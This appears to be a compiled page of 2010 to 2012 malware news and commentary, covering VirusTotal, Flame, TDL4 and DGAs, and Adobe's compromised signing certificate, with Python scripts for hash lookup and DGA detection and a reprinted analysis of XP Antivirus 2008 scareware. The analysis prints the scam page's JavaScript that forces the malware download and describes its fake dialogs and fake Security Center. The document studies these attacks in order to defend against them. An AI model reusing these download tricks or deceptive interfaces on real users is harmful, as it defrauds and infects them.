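if __name__ == "__main__":
    digest = "d71a89c085ffbb62f4e222fb2f42d7e2271e4642"  # SHA1 quoted in the VBNA-X item
    key = os.environ.get("VT_API_KEY")
    report = lookup(digest, key) if key else SAMPLE_REPORT  # offline: use the sample
    print(describe(digest, report))
```

Without VT_API_KEY the script summarizes the built-in sample; with it, the same code performs the live lookup. The detection label per engine is what the page calls the "exact detection label", and it is what lets you tie a VirusTotal hit back to the vendor names used in an advisory.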

Online malware research community

In August 2010 VirusTotal integrated a pseudo-social network that allows its users to interact with other users and comment on files and URLs. These comments may range from deep malware analyses to information on the distribution vector and in-the-wild locations of the submitted files, hence, the community acts as the collective intelligence component of VirusTotal. Files and URLs can be voted as malicious or innocuous, building a community maliciousness score for the resource.

In other words, when security products fail (false positives/false negatives), there is still a chance that some VirusTotal Community user will have produced a useful review of the resource for its community peers.

Desktop applications for interacting with the service

With the aim of making the Internet a safer place VirusTotal's team has released a number of desktop applications and tools for interacting with the service (one-click file uploader, browser extensions, etc.). Many of VirusTotal's users have also developed their own applications and have made them publicly available on the Internet. More information about these resources can be found in the advanced features section.

VirusTotal and confidentiality

Files and URLs sent to VirusTotal will be shared with antivirus vendors and security companies so as to help them in improving their services and products. We do this because we believe it will eventually lead to a safer Internet and better end-user protection.

By default any file/URL submitted to VirusTotal which is detected by at least one scanner is freely sent to all those scanners that do not detect the resource. Additionally, all files and URLs enter a private store that may be accessed by premium (mainly security/antimalware companies/organizations) VirusTotal users so as to improve their security products and services.

[Nov 29, 2012] Real-World Cyber City Used To Train Cyber Warriors

Posted by Soulskill
from the augmented-reality-mmo-for-hackers dept.

Orome1 writes "NetWars CyberCity is a small-scale city located close by the New Jersey Turnpike complete with a bank, hospital, water tower, train system, electric power grid, and a coffee shop. It was developed to teach cyber warriors from the U.S. military how online actions can have kinetic effects. Developed in response to a challenge by U.S. military cyber warriors, NetWars CyberCity is an intense defensive training program organized around missions. 'We've built over eighteen missions, and each of them challenges participants to devise strategies and employ tactics to thwart computer attacks that would cause significant real-world damage,' commented Ed Skoudis, SANS Instructor and NetWars CyberCity Director."

[Nov 29, 2012 ] Virus Eats School District's Homework

That is simply ridiculous. Can't they just restore images like they are doing with computers in university labs?

"Forget about 'snow days' - the kids in the Lake Washington School District could probably use a few 'virus days.' Laptops issued to each student in grades 6-12 were supposed to accelerate learning ('Schools that piloted the laptops found that students stayed engaged nad [sic] organized whiel [sic] boosting creativity,' according to the district's Success Stories), but GeekWire reports that a computer virus caused havoc for the district as it worked its way through the Windows 7 computers, disrupting class and costing the district money - five temporary IT staff members were hired to help contain the virus. Among the reasons cited for the school district's choice of PCs over Mac's were the proximity to Microsoft HQ (Redmond is in the district), Microsoft's involvement in supporting local and national education, and last but not least, cost. In the past, the Lake Washington School District served as a Poster Child of sorts for Microsoft's Trustworthy Computing Group."

[Nov 25, 2012] Browser Guard 2011

This is a good start, but we really need something that blocks sites whose DNS was just registered by the same person/organization who previously registered malicious sites. OpenDNS is one possibility. Symantec DNS is another.

Trend Micro USA

Proactively protect your browser against new web threats. Browser Guard 2011 has zero-day vulnerability prevention and protects against malicious JavaScript using advanced heuristics and emulation technologies.

Browser Guard is quickly and continuously updated to deliver the most secure and up-to-date technology. The latest version includes detection enhancement for Web Trojans, and for tracing infection chains.

[Nov 25, 2012] Trend Micro Browser Guard v2.0

Trend Micro Browser Guard 2010 is an Internet Explorer plug-in that monitors the pages you visit to protect you from malicious JavaScript.

The program works entirely automatically, so there are no complex settings to consider, no configuration worries at all. Just install it and Browser Guard will analyse any JavaScript on the pages you visit, detecting buffer overflow and heap spray attacks, blocking attempts to execute shell code, and generally keeping you just a little safer online.

While you might expect this extra layer of protection would slow down your browsing a little, there was no noticeable change on our test PC (and IE told us the add-on took a mere 0.03 seconds to launch). If you're running an old underpowered laptop then maybe you'll see a performance impact, but otherwise there are unlikely to be any problems.

Otherwise the program seems very compatible, running on 32 or 64-bit Windows XP, Vista or 7, and all versions of Internet Explorer from 6 to 9.0, and is most unlikely to conflict with any other security software. So if you use IE, even only occasionally, then Browser Guard 2010 offers an easy way to gain a little extra protection from malicious websites.

[Nov 24, 2012]

In my case I just re-imaged the infected computer using Softpanorama Malware Defense Strategy without much analysis.

In the case that I know of, the PC was infected by browsing a Web site (probably a shareware website), not by any email attachment.

There are three files in "C:\Documents and Settings\dell\Start Menu\Programs\Startup\"

-r-xr-xr-x+ 1 nnb None  53121 Dec  9  2010 kiaqas.exe
-r-xr-xr-x+ 1 nnb None  57217 Dec  9  2010 mssvig.exe
-r-xr-xr-x+ 1 nnb None  53121 Dec  9  2010 stdlas.exe

If you delete or rename them in Windows, they reappear. They might be related to Trojan-GameThief.Win32.

This Trojan is designed to steal account data and passwords. It probably exists in several modifications tuned to different online game targets.

[Nov 24, 2012] U.S. Denies Using Flame Malware To Spy On French President

November 23 | Slashdot

CowboyRobot writes with the (not unexpected) official U.S. denial of using the Flame malware to spy on France. From the article: "That allegation was leveled at the U.S. government by unnamed French officials, according to a Tuesday report in the weekly French newspaper L'Express. It reported that computers belonging to top advisers to then French president Nicolas Sarkozy had been hacked using the Flame cyberespionage malware, which was designed to be used in highly targeted attacks... Napolitano was also asked if it wasn't ironic that while the United States has been sounding alarms over the growing amount of malware that's targeting U.S. government systems, it is also commissioning the Stuxnet and Flame cyber-espionage malware used against Iran. Napolitano, however, pled official ignorance. 'These programs were never attributed in any way to the U.S. government.'"


France has often gone its own way - from banking with gold, post ww2 occupation of Germany, pre Vietnam, weapon sales, NATO nuclear policy, 'freedom fighter' support in Libya, Syria...
Aerospace, advanced space platforms, bridge building/telco/dams/nuclear/oil/mining contracts- France is just very good at building stuff at a fair rate or for its friends around the world and the USA sees that as its unique profit pool.
France knows the NSA loves to watch French trade deals and all French political leaders and report on any trade deals not won by the USA.
Did something very bad happen in Libya wrt to Syria and SAM like systems?
Is France going its own way with Syrian "freedom fighters" and offering much more exotic weapons found in Libya? Are some parts of the US gov very upset?
Is the USA going its own way with Syrian "freedom fighters" and offering much more exotic weapons found in Libya? Are some parts of the French gov very upset?
As for why?
France knows of ECHELON, they know of the origins of Flame....
Why is France running Windows at that level on the 'net'? Why would the US do this to France in such an open, foolish way?
Or was a well known 3rd party playing games with the French/US relationship and wanted a public 'issue' out of the story.
The final option? The USA watches France and its trade, but older US spies should recall Vladimir Vetrov - France was very helpful to the US - Has the US lost control of a part of its new "younger" cyber command?


Why is France running Windows at that level on the 'net'?

Change is always seen as annoying by users, and top level executive users have the power to resist change, if they are stupid enough to not understand why they need it. I am not sure French military security experts would have been able to impose something on Sarkozy and his counselors.

[Nov 24, 2012] US, Israel Behind Flame Malware

June 19 | Slashdot

The Washington Post is reporting that the sophisticated 'Flame' malware was created by the United States and Israel in order to collect intelligence on Iranian computer networks. The intel was to be used in a cyber-sabotage campaign intended to slow Iran's development of nuclear weapons. This follows confirmation a few weeks ago that the U.S. and Israel were behind Stuxnet, which caused problems at Iran's nuclear facilities. From the article: "The emerging details about Flame provide new clues to what is thought to be the first sustained campaign of cyber-sabotage against an adversary of the United States. 'This is about preparing the battlefield for another type of covert action,' said one former high-ranking U.S. intelligence official, who added that Flame and Stuxnet were elements of a broader assault that continues today. 'Cyber-collection against the Iranian program is way further down the road than this.' ... The scale of the espionage and sabotage effort 'is proportionate to the problem that's trying to be resolved,' the former intelligence official said, referring to the Iranian nuclear program. Although Stuxnet and Flame infections can be countered, 'it doesn't mean that other tools aren't in play or performing effectively,' he said."

[Oct 03, 2012] Elusive TDL4 malware variant infected Fortune 500 companies, gov't agencies by Lucian Constantin

While information on DGA is interesting, "researchers from security vendor Damballa" like any "security vendor researchers" are far from being the most trustworthy folk in such cases. They usually promote FUD in the interests of their companies and are as close to PR scum as one can get. See also TDL4
September 18, 2012 | Computerworld

Researchers from security vendor Damballa have identified malicious Internet traffic that they believe is generated by a new and elusive variant of the sophisticated TDL4 malware.

The new threat, which has been assigned the generic name DGAv14 until its true nature is clarified, has affected at least 250,000 unique victims so far, including 46 of the Fortune 500 companies, several government agencies and ISPs, the Damballa researchers said in a research paper released Monday.

On July 8, Damballa sensors that operate on the networks of telecommunication operators and ISPs that partnered with the company detected a new pattern of DNS (Domain Name System) requests for non-existent domains. Such traffic suggests the presence on the network of computers infected with malware that uses a domain generation algorithm (DGA).

Some malware creators use DGAs in order to evade network-level domain blacklists and to make their command and control infrastructure more resilient against takedown attempts.

DGAs generate a number of random-looking domain names at predefined time intervals for the malware to connect to. Because the attackers know which domain names their algorithm will generate and access at a future point in time, they can register some of them in advance and use them to issue commands to infected computers.

Even if those domains are later shut down, the overall operation is not affected because the malware will generate and use different domain names in the future.
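The NXDOMAIN pattern described above, turned into a small detection routine as an added example (not Damballa's or GTISC's code): each client in a resolver log is scored by its share of NXDOMAIN answers and by the entropy of the names it asked for, since a burst of random-looking names that do not resolve is exactly what a DGA leaves behind. The log format, the sample lines, the IP addresses and the thresholds are all constructed for this example.

```python
"""Score DNS clients for domain generation algorithm (DGA) behaviour.

Added example, not Damballa's or GTISC's code. It implements the signal the
article describes: a client that issues bursts of requests for random-looking
names that do not resolve (NXDOMAIN). Each client is scored on its NXDOMAIN
ratio and the mean Shannon entropy of the second-level labels it queried.
The log format, sample lines, IP addresses and thresholds are all constructed.
"""
import math
import re
from collections import defaultdict

# Constructed resolver log format: "<timestamp> <client_ip> <qname> <rcode>"
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(NOERROR|NXDOMAIN)$")


def shannon_entropy(text):
    """Bits of entropy per character; a label with all-distinct characters
    scores log2(len), dictionary words score noticeably lower."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def second_level_label(qname):
    """Label left of the TLD (naive: treats co.uk-style suffixes as a TLD)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def parse_log(lines):
    """Return (client, qname, rcode) tuples, skipping lines that do not match."""
    records = []
    for line in lines:
        match = LOG_LINE.match(line.strip())
        if match:
            _ts, client, qname, rcode = match.groups()
            records.append((client, qname, rcode))
    return records


def score_clients(records, min_queries=5):
    """Per-client NXDOMAIN ratio and mean label entropy, for clients with at
    least min_queries lookups (a handful of lookups gives a noisy ratio)."""
    stats = defaultdict(lambda: {"queries": 0, "nx": 0, "entropy_sum": 0.0})
    for client, qname, rcode in records:
        s = stats[client]
        s["queries"] += 1
        if rcode == "NXDOMAIN":
            s["nx"] += 1
        s["entropy_sum"] += shannon_entropy(second_level_label(qname))
    scores = {}
    for client, s in stats.items():
        if s["queries"] < min_queries:
            continue
        scores[client] = {
            "queries": s["queries"],
            "nxdomain_ratio": s["nx"] / s["queries"],
            "mean_entropy": s["entropy_sum"] / s["queries"],
        }
    return scores


def suspected_dga_clients(records, nx_ratio=0.6, entropy=3.0, min_queries=5):
    """Clients over both thresholds (constructed values; tune per network).
    A typo also yields NXDOMAIN, so both signals are required together."""
    scores = score_clients(records, min_queries)
    return sorted(
        client for client, s in scores.items()
        if s["nxdomain_ratio"] >= nx_ratio and s["mean_entropy"] >= entropy
    )


# Constructed sample log: one ordinary client (with one typo), one infected
# client whose generated names mostly fail except for the one the operators
# registered in advance, and one client with too few lookups to judge.
SAMPLE_LOG = [
    "2012-07-08T10:00:01Z 10.0.0.5 www.google.com NOERROR",
    "2012-07-08T10:00:02Z 10.0.0.5 mail.example.org NOERROR",
    "2012-07-08T10:00:03Z 10.0.0.5 cdn.example.net NOERROR",
    "2012-07-08T10:00:04Z 10.0.0.5 www.wikipedia.org NOERROR",
    "2012-07-08T10:00:05Z 10.0.0.5 login.microsoft.com NOERROR",
    "2012-07-08T10:00:06Z 10.0.0.5 wikipedai.org NXDOMAIN",
    "2012-07-08T10:00:07Z 10.0.0.23 xk3qzv8wpl2m.com NXDOMAIN",
    "2012-07-08T10:00:07Z 10.0.0.23 9fjq2lxzt0ab.net NXDOMAIN",
    "2012-07-08T10:00:08Z 10.0.0.23 ru7nbd4sgyqe.org NXDOMAIN",
    "2012-07-08T10:00:08Z 10.0.0.23 ow1zptk6hvxc.com NXDOMAIN",
    "2012-07-08T10:00:09Z 10.0.0.23 mq5lsfa3djrn.net NXDOMAIN",
    "2012-07-08T10:00:09Z 10.0.0.23 t8cvbkx2gzpu.org NXDOMAIN",
    "2012-07-08T10:00:10Z 10.0.0.23 ye4hwqp9lzsx.com NOERROR",
    "2012-07-08T10:00:11Z 10.0.0.9 k2mzq9xvwplt.biz NXDOMAIN",
    "2012-07-08T10:00:12Z 10.0.0.9 g7bhna3rsyuc.info NXDOMAIN",
]

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for client, s in sorted(score_clients(recs).items()):
        print(client, s)
    print("suspected DGA clients:", suspected_dga_clients(recs))
```

The one NOERROR answer for 10.0.0.23 is the kind of name a sinkhole operator would register ahead of time, as the article describes Damballa and GTISC doing.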

In collaboration with researchers from the Georgia Tech Information Security Center (GTISC), the Damballa researchers registered some of the domain names the new threat was attempting to access and monitored the traffic it sent to them.

This type of action is known as sinkholing and, in this case, it revealed that the new malware is part of a click-fraud operation that involves rogue advertisements being injected into various websites including,,,, and when opened on infected computers.

An analysis of other domain names registered by the attackers themselves and the networks where they hosted those domains revealed similarities to the command and control infrastructure used by the gang behind the TDL4 malware family.

TDL4, also known as TDSS, is considered to be one of the most sophisticated malware threats ever created and used by cybercriminals -- without counting threats like Stuxnet, Flame, Gauss and others that are believed to have been created by nation states for cyberespionage purposes.

TDL4 is part of a category of malware known as bootkits -- boot rootkits -- because it infects the hard disk drive's Master Boot Record (MBR), the sector that contains information about a disk's partition table and the file systems. The code that resides in the MBR is executed before the OS actually starts.

[Oct 03, 2012] Sorry, but the TDL botnet is not 'indestructible' Malware by Roger A. Grimes

See also TDL4
June 30, 2011 |

Malware and alarmism over its proliferation are nothing new -- and the latest boot-sector rootkit will be cured soon enough

The sophistication of the TDL rootkit and the global expanse of its botnet have many observers worried about the antimalware industry's ability to respond. Clearly, the TDL malware family is designed to be difficult to detect and remove. Several respected security researchers have gone so far as to say that the TDL botnet, composed of millions of TDL-infected PCs, is "practically indestructible."

As a 24-year veteran of the malware wars, I can safely tell you that no threat has appeared that the antimalware industry and OS vendors did not successfully respond to. It may take months or years to kill off something, but eventually the good guys get it right.

This isn't the first time we're supposed to be scared of MBR (master boot record)-infecting malware. In 1987, well before the days of the Internet, the Stoned boot virus infected millions of PCs around the world. Subsequent "improvements" in hacking allowed malware authors to create DOS viruses that could manipulate the operating system to hide themselves from prying eyes. (Actually, the first IBM PC virus, Pakistani Brain did this in 1986, too.) Computer viruses became encrypted and polymorphic, and they started taking data hostage.

With each ratcheting iteration of new malware offense, you had analysts and doomsayers predicting this or that particular malware program would be difficult to impossible to defend against. But each time the antimalware industry and other software vendors responded to defang the latest threat. Yesterday's indestructible virus became tomorrow's historical footnote.

Even today's malware masterpiece, Stuxnet -- as perfect as it is for its intended military job -- could be neutralized if it became superpopular. Luckily, military-grade worms are few and far between, so most users don't have to suffer while waiting for defenses to be developed.

The truth is, like every other malware family variant, TDL and its botnet will probably be around for years to exploit millions of additional PCs. But it didn't take an advanced superbot to do that. Take a look at any monthly WildList tally. It always contains malware programs written years ago.

Today, almost every malware program lives in perpetuity, dying off only when the exploited program or process dies with it. Boot viruses from the 1980s and 1990s didn't stop being a threat until floppy disks and disk drives went away. Macro viruses didn't die until people stopped writing macros and Microsoft Office disabled automacros by default.

No, what really bothers me more are the malware programs that do something completely new because it takes so much longer for antimalware programs, software vendors, and users to adapt to the tactic. For instance, it took us years to teach folks not to open every file attachment to defeat email viruses and worms -- but it takes the bad guys only a few minutes to change strategies. Today, we need to tell folks not to click on the Internet link emailed to them by a trusted friend and not to install random applications sent to them in Facebook or through their mobile phone.

But our biggest threat is an MBR PC-infector? Been there, done that.

This article, "Sorry, but the TDL botnet is not 'indestructible'," was originally published at Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest business technology news, follow on Twitter.

[Oct 03, 2012] Tdl-4 boot bot virus reformat good enough to kill it - Yahoo! Answers

See also TDL4
Microsoft developed this just for this Microsoft Standalone System Sweeper Beta…

Microsoft Standalone System Sweeper Beta is not a replacement for a full antivirus solution providing ongoing protection; it is meant to be used in situations where you cannot start your PC due to a virus or other malware infection. It is a recovery tool that can help you start an infected PC and perform an offline scan to help identify and remove rootkits and other advanced malware. In addition, Microsoft Standalone System Sweeper Beta can be used if you cannot install or start an antivirus solution on your PC, or if the installed solution can't detect or remove malware on your PC.

Cannot hurt to try.

2nd Option

They advise you to fix the MBR and then use a recovery CD to restore your system to a pre-infected state (as sometimes restoring a system may not restore the MBR). To fix the MBR, we advise that you use the System Recovery Console, which supports a command called "fixmbr".

To find out how to use your system's recovery options, refer to the following article
For Windows 7: System Recovery Options in Windows 7…

[Sep 28, 2012] Adobe Revoking Code Signing Certificate Used To Sign Malware


wiredmikey writes

"Adobe said Thursday it will be revoking a code signing certificate next week after discovering two pieces of malware that had been digitally signed with Adobe's credentials. Two malicious utilities, pwdump7 v7.1 and myGeeksmail.dll, both came from the same source and were signed with valid Adobe digital certificates, Adobe's Brad Arkin said. Adobe plans to revoke the impacted certificate on Oct. 4. After initial investigation, the company identified a compromised build server which had been used to access the code signing infrastructure, Brad Arkin wrote in a blog post.

The build server did not have rights to any public key infrastructure functions other than the ability to issue requests to the signing service and did not have access to any Adobe products such as Flash Player, Adobe Reader, Shockwave Player, or Adobe AIR, Arkin said.

According to Adobe, most customers won't notice anything out of the ordinary during the certificate revocation process, but some IT administrators may have to take some actions in response."

Incredible pathetic (Score:5, Insightful)
by gweihir (88907) writes: on Thursday September 27, @09:45PM (#41484491)

If signing certificates for code do not even get basic certificate protection (standard infrastructure, but offline, and signing machine does nothing else but sign builds), then code signatures become not only worthless, they get negative worth, because they imply security where there is none.


If I found that one of my PGP keys were compromised, I would revoke it in less than 5 minutes. Why does it take a week to revoke a code-signing certificate? How much more damage might occur in that week?

[Sep 28, 2012] Smart-Grid Control Software Maker Hacked by timothy

September 27, 2012 | Slashdot
tsu doh nimh writes

"Telvent, a multinational company whose software and services are used to remotely administer and monitor large sections of the energy and gas industries, began warning customers last week that it is investigating a sophisticated hacker attack spanning its operations in the United States, Canada and Spain. Brian Krebs reports that the attacker(s) installed malicious software and stole project files related to one of Telvent's core offerings - OASyS SCADA - a product that helps energy firms mesh older IT assets with more advanced 'smart grid' technologies.

A follow-up story from got confirmation from Telvent, and includes speculation from experts that the 'project files' could be used to sabotage systems. 'Some project files contain the "recipe" for the operations of a customer, describing calculations and frequencies at which systems run or when they should be turned on or off. If you're going to do a sophisticated attack, you get the project file and study it and decide how you want to modify the pieces of the operation. Then you modify the project file and load it, and they're not running what they think they're running.'"

[Sep 11, 2012] Anatomy of a malware scam • by Jesper M. Johansson

This is a free whitepaper, but requires registration. Version provided here does not include any images.
August 22, 2008 | Reg Whitepapers

The evil genius of XP Antivirus 2008

Anyone who has a blog has probably seen blog spam; comments to the blog that simply try to entice people to go to some other site. Most of the time the site being advertised is simply trying to boost its search engine rankings to generate more ad revenue.

The more links there are to a site, the more popular the search engines figure it is, and the higher up in the search results it ends up. Blog spam, therefore, is frequently thought to be a good way to boost the search engine rankings. In some cases this turns malicious. Some sites engage in wholesale intellectual property theft to boost their rankings.

A few of weeks ago, however, I started noticing something far more insidious. I moderate all comments to my blog. This is something I started years ago to keep the blog somewhat family friendly, and to avoid propagating malicious content. Recently I also completely disabled trackbacks to avoid boosting the search engine rankings for sites that steal my work. This means I see every comment that comes into my blog. The other day I noticed one that contained nothing more than a link to a fake Google site: google-images.

This looked very suspicious to me so I made a note of it. Over the next several weeks I noticed a lot more of these, not only pointing to Google but also to Yahoo and MSN. The servers they pointed to all had the same basic structure, such as,,, etc. Every one resolves to the same IP address: That IP address is registered to in Singapore. The server appears to be hosted out of Kuala Lumpur. The domains, however, are registered in Ukraine: confirms this. You will soon see a related domain, That one is registered to Chebotarev Oleksandr, in Odessa, Ukraine. This had me very curious and I wanted to know more about what this site was attempting to achieve. Consequently, I fired up a virtual machine and started investigating. What I found was an interesting tale of trickery.

The First Hint

The first thing a potential victim would do is open up one of the sites. For my tests I used I did my initial test on Windows Vista. After various trickery, I got the dialog in figure 1.

Notice the chrome in Internet Explorer. My virtual machine is running Windows Vista. The popup, however, has the XP chrome. As it turns out, the popup is not a popup at all. The whole page is just one image, hyperlinked to a file download. I must give the criminals here credit for graying out the background to lend it credibility; a la Vista User Account Control (UAC). One of the questionable benefits of UAC is that it has conditioned people to believe that as long as the screen background is grayed out they can trust whatever is on the screen.

Before the popup in the screen shot there was actually another one too. That one was an animated GIF that looked like it was performing a virus scan of your computer. Needless to say, it found several pieces of fake malware on my computer, hence the dire warning in the fake popup.

If this looks suspicious to you, it should. We are not on We are on When you go to any of the sites that are linked in the blog comments you download a few files, and then it redirects you to, where the last part is some form of identifier that we will return to shortly.

Similar sites to this one have been reported at least as far back as 2003. The modus operandi does not change, although the exact details of what the sites do seem to. It appears likely that these sites are all related and that there are multiple fronts for them. appears to be hosted at an ISP in Pennsylvania at the time of this writing, but that is likely to change by the time you read this. In fact, between the time I started researching this and the time I wrote the article, the site name had changed to

Workflow Step by Step

At this point I was sufficiently curious to walk through the work-flow step by step. You may enjoy what I discovered. Starting from the beginning, when I first went to I received the warning in Figure 2.

It is quite nice of them to warn me about malware. It's also nice that they are offering to solve all my problems for free. Note also that I repositioned the dialogs in Figure 2 so you can better see what is happening. Without doing that the very small web browser window is actually hidden behind the dialog to make it look as if the dialog is coming from your computer, not a web page. If you click "OK" in figure 2, you get figure 3. If you click cancel, it just goes directly to a download for a fake anti-malware program.

The warning in figure 3 just lets you know that you are about to download something. Obviously the criminals are well aware that users are incredibly desensitized to warnings and the more warnings they get, the less they pay attention to them. Click OK in that warning, and you get the page in Figure 4.

Figure 4 is the same as Figure 1, but this time with the proper chrome as this virtual machine was running Windows XP. It turns out that the malware actually failed to install on Windows Vista (no, I did not file a bug with the authors to get that fixed), so I went back to Windows XP for my testing.

The page in Figure 4 is mostly just a composite of several images. The scan itself is a javascript that draws the progress bar. The file list that it iterates through when it performs the fake scan is a list of 1,100 names in a file called fileslist.js. That file also contains the 14 fake pieces of malware that it "discovers."

Figure 1: The site issues a redirect to a different site

Figure 2: Initial warning

The warning dialog itself is a GIF image called popup3.gif. Virtually all areas of the page, including popup3.gif, are linked through an on-click event to a function called onloadExecutable(), which looks like this:

function onloadExecutable()
{
    // Hard-coded timestamp; only used to derive the victim's UTC offset (dlth)
    var dat = new Date(1214372723);
    var dlth = dat.getHours() - dat.getUTCHours();
    rrc = 1;
    // Send the browser to the download script; aid ends up as the fake "version number"
    location.href = "../_download.php?aid=880421&dlth=" + dlth;
}
This function does nothing more than trigger a download by setting the location of the browser to a script that initiates a download. The use of this design makes it harder to track down what they are doing since most forensics tools, such as wget, do not execute javascript. The objective, however, is quite clear: you are prompted to download something. The aid parameter is going to be appended to your download name as a version number. The time parameter does not seem to be used at all.

One very interesting behavior of popup3.gif is that the fake close button is actually linked to a special warning. If you click that button, you get the warning in Figure 5.

If you click OK in Figure 5 it runs the onloadExecutable() function. If you click cancel or close it throws another warning, shown in Figure 6. That warning will run onloadExecutable() no matter what you do; whether you click the OK button or the red X to close it.

Therefore, no matter what you do, you will be prompted to download a file. The file is: http:// XPantivirus2008_v880421.exe. The v880421 part of the file is a fake version number which bubbled all the way from the original page. It does not seem to change very frequently. However, I tried a few hundred different numbers surrounding 880421 and most resulted in a valid download. Disturbingly, they all seem slightly different. It is possible that download.php runs the file through an obfuscator, but more than likely they have a few hundred different obfuscated versions of the same malware sitting on the server.

After downloading the file, I sent it to, a site that scans files on demand using a large number of reputable commercial anti-malware engines. The results varied a little depending on the day I tried it and which version of the file I sent them. For example, on June 24, only GData and Kaspersky detected the current version as malware. A version just a day older was also detected as malicious by AntiVir, eSafe, Sophos, and Webwasher-Gateway. The actual malware contained in the file is the Trojan-Downloader.Win32.FraudLoad.gen downloader trojan.

Figure 3: The malware is independently certified

Figure 4: Fake Scan Results

Figure 5: Closing one warning brings up another

Figure 6: Closing that warning brings up one that gives you no options

Installing the Malware

The malware is actually quite well written, looking very professional. The installer starts out with a notification shown in Figure 7. It includes what appears to be a Windows compatibility logo, fake of course, and has a link to the terms and conditions.

The terms and conditions also look very professional. A snippet is shown in Figure 8.

The license agreement looks about like what you would expect from commercial software. Interestingly, however, it seems exclusively focused on the website, not on the software you are trying to install. It even tries to restrict how you can provide links to their site. That alone should be a reasonable hint, providing anyone actually ever reads license agreements.

The agreement also provides a link to the support site for the malware. A portion of the help file is shown in Figure 9.

Once you know this is malware, the help site is almost comical. It has information about bug reporting, conspicuously lacking an actual method to submit bug reports. It makes it clear how much you will be charged to install the malware, and even uses the boilerplate language about how safe it is to submit your credit card to them because no criminals will be able to read the encrypted transmission; until it reaches the criminals who asked for it, of course. There is even a link to an online support forum, shown in Figure 10.

The support forum looks well done, with mostly well designed graphics and the requisite list of cryptic malware names you find in the support forums for all anti-malware software. This list of malware is, of course, fake. However, it gives a nice view into what other sites might be associated with the same gang of criminals., antivirus-2008-pro.com,, winantispyware2008.com, and are just some of the sites advertising solutions to W32.Trojan.Downloader.s. In fact, 411-spyware has a thread on that particular fake threat ( w32-trojan-downloader-s).

Figure 7: The installer looks very professional

Figure 8: The malware comes with terms and conditions

Figure 9: The malware has everything, including a help site

Figure 10: The malware has a support forum

Sending Your Money to the Bad Guys

If you chose to actually pay for the software you will be directed to com. That site is hosted out of Bridgetown, Barbados. According to several websites, software-payment.com appears to be a bit of a favorite among those pushing fake anti-malware. This forum thread has a list of other fake anti-malware that used it for their billing services.

The software costs $49.95, as shown in Figure 9. However, when you try to register it you are also offered an upgrade to File Shredder 2008, for only $39.95. It is not clear whether that upgrade destroys your data only locally, or whether, for that fee, the bad guys will destroy your data securely on their own servers after they use it to steal your identity and your money. You may also add premium support for $24.95.

What it installs

The first thing you will notice after installation is that you are presented with the Windows Security Center, shown in Figure 11; except that it actually is not the Windows Security Center.

Figure 11 shows a fake Windows Security Center. It looks very much like the real thing, shown in Figure 12 on the same computer, at the same time, for comparison purposes. Note that the real one does NOT detect the malware as a legitimate anti-virus program. The primary differences are twofold. First, the recommendations link in the fake one is linked to a dialog that will try, once again, to make you purchase the fake anti-malware. In the real one, it links to a help document explaining how to obtain anti-malware software.

The fake Windows Security Center also has a list of resources on the left hand side. However, all of them are linked to documents that entice you to pay for the malware. In the real one they link to real help files. It is likely that the criminals created the fake Windows Security Center so they could control exactly what you saw when you clicked on anything in it and link it to the ubiquitous purchase screen. The real Windows Security Center is still present on the computer. Notice the Control Panel in Figure 13.

The real Windows Security Center is the one called just "Security Center" in the Control Panel. The fake one is the one called "Windows Security Center." In addition, the fake one identifies itself as "Windows Security Center" in the system tray. The real one identifies itself as "Security Alerts." It is probably safe to say that most users would be hard pressed to conclude that the real one was not the one called "Windows Security Center." Once again, it is a matter of telling real from fake, and in this case, unfortunately, the real thing, while there, is not very good at identifying itself as the real thing consistently.

Figure 11: Fake Windows Security Center

Figure 12: Real Windows Security Center

Figure 13: Fake Windows Security Center in the Control Panel

If you leave the computer alone for a few minutes you will eventually get the first of many, many popups of various kinds, shown in Figure 14.

The warning in Figure 14 is yet another attempt at getting you to send your money to the criminals. If you click the "Remove all threats now" button it will take you to a purchase screen. Interestingly, the "Continue unprotected" button does not take you there, breaking with the previous history. If you use that button you will start getting system tray popups. An example is shown in Figure 15.

The malware uses several different system tray warnings. Another one is shown in Figure 16.

Interestingly, while virtually everything else the malware has shown us so far has been in flawless English, the system tray popups have grammatical mistakes and missing prepositions. More than likely this is indicative of collusion within a criminal gang to create the malware. The software and all the associated collateral are far too complex to be written by a single person in a reasonable time, so the source is likely a gang. The individual that wrote the system tray popups apparently did not receive the grammar tutorial the others did. Or, maybe, the system tray popups just were not part of the user acceptance testing plan.

Figure 14: The first of many warnings

Figure 15: One of several different scary looking system tray warnings

Figure 16: Another system tray warning

At regular intervals you also get a strange corner popup, shown in Figure 17.

The corner popup also shows up in the region of the system tray but is just a window. It has an "Update Now" button that takes you to the purchase site. Once again, the malware is specifically designed to entice you to pay for it.

The application itself looks reasonably good. Figure 18 shows the main application window during a "scan."

If you compare Figure 18 to your average legitimate anti-malware suite you would probably be inclined to agree that this looks perfectly legitimate to most people. It finds bad stuff, which is good, and the bad stuff is sufficiently scary sounding to make me want to get it removed, even if it costs me $49.95, plus the File Shredder 2008 license. Just in case that was not enough to entice me to purchase the malware, however, we also have the system status screen in Figure 19, which is designed to frighten you into compliance. By now you can probably guess where the "Update Now" button goes. There are at least four buttons in Figure 19 that lead to the "send us your money now" website. One can only marvel at how much better the criminals are at separating you from your money than the legitimate anti-malware vendors.

Interestingly, in my testing, the malware did not actually take any malicious action beyond what I have documented here. I did not detect any attempts at stealing data, at installing additional malware, or at remote control. This could be for several reasons. The purpose may just be to get some of your money, and maybe a credit card number. Alternatively, it may be that the software is time-triggered to make it harder to analyze. Most analysts do not have the luxury to let it run continuously for weeks whereas the bad guys can easily wait that long for the payout. Finally, the software may include detection logic to discover that it is running in a virtual machine, causing it to forego some of the malicious actions it otherwise would. Such logic is becoming more common in malware as it makes it far more difficult for researchers to analyze the software.

Figure 17: A corner popup

Figure 18: A scan of your system obviously finds many fake infections

Figure 19: The System Status screen is designed to be scary

Detection by Legitimate Software

As a final experiment I decided to see if I could remove the malware, or at least detect it, with legitimate anti-malware software. At first I attempted with the recently updated Microsoft Malicious Software Removal Tool (from June 24, 2008, the most recent available at the time I wrote this). It failed to detect the software.

